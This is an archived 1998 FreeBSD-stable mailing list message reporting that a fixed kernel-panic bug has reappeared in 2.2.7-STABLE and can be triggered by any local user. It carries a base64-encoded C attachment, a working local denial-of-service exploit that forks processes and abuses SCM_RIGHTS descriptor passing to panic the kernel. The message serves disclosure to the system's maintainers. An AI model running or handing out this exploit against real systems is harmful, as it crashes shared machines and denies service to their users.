Skip site navigation (1)Skip section navigation (2) 
Date:      Tue, 11 Aug 1998 00:31:03 -0700 (PDT)
From:      Scott <scott@SchematiX.net>
To:        FreeBSD-stable@FreeBSD.ORG
Subject:   Huge Bug in FreeBSD not fixed?
Message-ID:  <Pine.BSF.4.02.9808110025020.216-200000@SchematiX.net>
next in thread | raw e-mail | index | archive | help 
  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

--0-1205284948-902820663=:216
Content-Type: TEXT/PLAIN; charset=US-ASCII

I ran across this bug a while back on rootshell, and then again by a user
on IRC who offered to take down my box. Soon after that, the bug was fixed
and things were fine. But just out of boredom, i decided to run the
exploit again. Sure enough, i had a kernel panic and that was it. All of
this from a normal user account. The bug has reoccured recently and may
cause problems on my server if the users find out about the vulnerability.

I am running FreeBSD 2.2.7-STABLE (Last compiled on August 5th early in
the morning). The system is running on a PII233 with 64MB RAM. This bug
REALLY needs to be fixed ASAP.

I would like to know if other systes are vulnerable as well. I discussed
this matter on IRC and everyone said they had similar problems. This bug
needs to be addressed soon. I would HATE switching to linux because my
system keeps crashing.


---------------
Scott Swindells, SchematiX.NET

--0-1205284948-902820663=:216
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="bsdbug.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.BSF.4.02.9808110031030.216@SchematiX.net>
Content-Description: 
Content-Disposition: attachment; filename="bsdbug.c"

LyogY3Jhc2hic2QuYw0KKioNCioqIFRISVMgUFJPR1JBTSBDQVVTRVMgS0VS
TkVMIFBBTklDIE9OIFNPTUUgU1lTVEVNUw0KKioNCioqIFVzYWdlOiBjcmFz
aG1lIFstLWhhcmRlcl0NCioqDQoqKiAtLWhhcmRlciBvcHRpb24gY2F1c2Vz
IHRoaXMgcHJvZ3JhbSB0byBsZWF2ZSBvcGVuZWQgZmlsZSBkZXNjcmlwdG9y
cyBoYW5naW5nDQoqKiB0aHVzIGluY3JlYXNpbmcgdGhlIHByb2JhYmlsaXR5
IG9mIHRoZSBjcmFzaC4NCioqDQoqLw0KDQojaW5jbHVkZSA8c3RkaW8uaD4N
CiNpbmNsdWRlIDxmY250bC5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2lu
Y2x1ZGUgPGVycm5vLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5j
bHVkZSA8c3lzL3VuLmg+DQojaW5jbHVkZSA8c3lzL3Vpby5oPg0KI2luY2x1
ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KDQpp
bnQgbWFpbihpbnQgYXJnYyxjaGFyICoqYXJndikgew0KaW50IGhhcmRlcj0w
LHAsbnByb2MsaCxpLHNvY2tldGZkc1syXTsNCmNoYXIgYVsxMF07DQpzdHJ1
Y3QgaW92ZWMgaW92MT17YSwxfTsNCnN0cnVjdCBjbXNnaGRyICpjbTsNCnN0
cnVjdCBtc2doZHIgbXNnOw0KY2hhciBiYnVmZmVyW3NpemVvZihzdHJ1Y3Qg
Y21zZ2hkcikrc2l6ZW9mKGludCkqMjRdOw0KDQppZihhcmdjPj0yJiYhc3Ry
Y21wKGFyZ3ZbMV0sIi0taGFyZGVyIikpIGhhcmRlcj0xOw0KDQpucHJvYz0t
MTsNCmZvcihpPTA7aTwxMDA7aSsrKXsNCiBpZighKHA9Zm9yaygpKSl7DQog
IGlmKHNvY2tldHBhaXIoQUZfVU5JWCxTT0NLX1NUUkVBTSwwLHNvY2tldGZk
cykpew0KICAgcGVycm9yKCJzb2NrZXRwYWlyIik7DQogICB9ZWxzZXsNCiAg
IGNtPShzdHJ1Y3QgY21zZ2hkciopYmJ1ZmZlcjsNCiAgIGNtLT5jbXNnX2xl
dmVsPVNPTF9TT0NLRVQ7DQogICBjbS0+Y21zZ190eXBlPVNDTV9SSUdIVFM7
DQogICBjbS0+Y21zZ19sZW49c2l6ZW9mKHN0cnVjdCBjbXNnaGRyKStzaXpl
b2YoaW50KTsNCiAgIG1zZy5tc2dfbmFtZT0oY2FkZHJfdCkwOw0KICAgbXNn
Lm1zZ19uYW1lbGVuPTA7DQogICBtc2cubXNnX2ZsYWdzPTA7DQogICBtc2cu
bXNnX2lvdj0maW92MTsNCiAgIG1zZy5tc2dfaW92bGVuPTE7DQogICBtc2cu
bXNnX2NvbnRyb2w9KGNhZGRyX3QpY207DQogICBtc2cubXNnX2NvbnRyb2xs
ZW49Y20tPmNtc2dfbGVuOw0KICAgaWYoZm9yaygpKXsNCiAgICBjbG9zZShz
b2NrZXRmZHNbMF0pOw0KICAgICooaW50KikoYmJ1ZmZlcitzaXplb2Yoc3Ry
dWN0IGNtc2doZHIpKT1vcGVuKCIvZGV2L251bGwiLE9fUkRPTkxZKTsNCiAg
ICBmb3IoaT0wO2k8MjA0ODtpKyspew0KICAgICBmcHJpbnRmKHN0ZGVyciwi
JWQ+ICIsaSsxKTsNCiAgICAgd2hpbGUoc2VuZG1zZyhzb2NrZXRmZHNbMV0s
Jm1zZywwKSE9MSl7DQogICAgICBpZihlcnJubyE9RUFHQUlOKXsNCiAgICAg
ICBwZXJyb3IoIlxuc2VuZG1zZyIpOw0KICAgICAgIH0NCiAgICAgIH0NCiAg
ICAgfQ0KICAgIH1lbHNlew0KICAgIGNsb3NlKHNvY2tldGZkc1sxXSk7DQog
ICAgZm9yKGk9MDtpPDIwNDg7aSsrKXsNCiAgICAgKihpbnQqKShiYnVmZmVy
K3NpemVvZihzdHJ1Y3QgY21zZ2hkcikpPS0xOw0KICAgICBmcHJpbnRmKHN0
ZGVyciwiPiVkICIsaSsxKTsNCiAgICAgY209KHN0cnVjdCBjbXNnaGRyKili
YnVmZmVyOw0KICAgICBjbS0+Y21zZ19sZXZlbD1TT0xfU09DS0VUOw0KICAg
ICBjbS0+Y21zZ190eXBlPVNDTV9SSUdIVFM7DQogICAgIGNtLT5jbXNnX2xl
bj1zaXplb2Yoc3RydWN0IGNtc2doZHIpK3NpemVvZihpbnQpKjI0Ow0KICAg
ICBtc2cubXNnX25hbWU9KGNhZGRyX3QpMDsNCiAgICAgbXNnLm1zZ19uYW1l
bGVuPTA7DQogICAgIGlvdjEuaW92X2xlbj0xMDsNCiAgICAgbXNnLm1zZ19p
b3Y9JmlvdjE7DQogICAgIG1zZy5tc2dfaW92bGVuPTE7DQogICAgIG1zZy5t
c2dfY29udHJvbD0oY2FkZHJfdCljbTsNCiAgICAgbXNnLm1zZ19jb250cm9s
bGVuPWNtLT5jbXNnX2xlbjsNCg0KICAgICBpZihyZWN2bXNnKHNvY2tldGZk
c1swXSwmbXNnLDApIT0xKXsNCiAgICAgIHBlcnJvcigiXG5yZWN2bXNnIik7
DQogICAgICB9ZWxzZXsNCiAgICAgIGZwcmludGYoc3RkZXJyLCIoJWQpICIs
KihpbnQqKShiYnVmZmVyK3NpemVvZihzdHJ1Y3QgY21zZ2hkcikpKTsNCiAg
ICAgIGlmKCFoYXJkZXIpew0KICAgICAgIGNsb3NlKCooaW50KikoYmJ1ZmZl
citzaXplb2Yoc3RydWN0IGNtc2doZHIpKSk7DQogICAgICAgfQ0KICAgICAg
fQ0KICAgICB9DQogICAgZXhpdCgwKTsNCiAgICB9DQogICB3YWl0KCZoKTsN
CiAgIH0NCiAgZXhpdCgwKTsNCiAgfWVsc2V7DQogIGlmKHA8MCl7DQogICBu
cHJvYz1pOw0KICAgaT0xMDA7DQogICB9DQogIH0NCiB9DQppZihucHJvYzww
KSBucHJvYz0xMDA7DQpmb3IoaT0wO2k8bnByb2M7aSsrKSB3YWl0KCZoKTsN
CmZwcmludGYoc3RkZXJyLCJcbiVkIHByb2Nlc3NlcyBmaW5pc2hlZFxuIixu
cHJvYyk7DQpyZXR1cm4gMDsNCn0NCg==
--0-1205284948-902820663=:216--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-stable" in the body of the message

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.4.02.9808110025020.216-200000>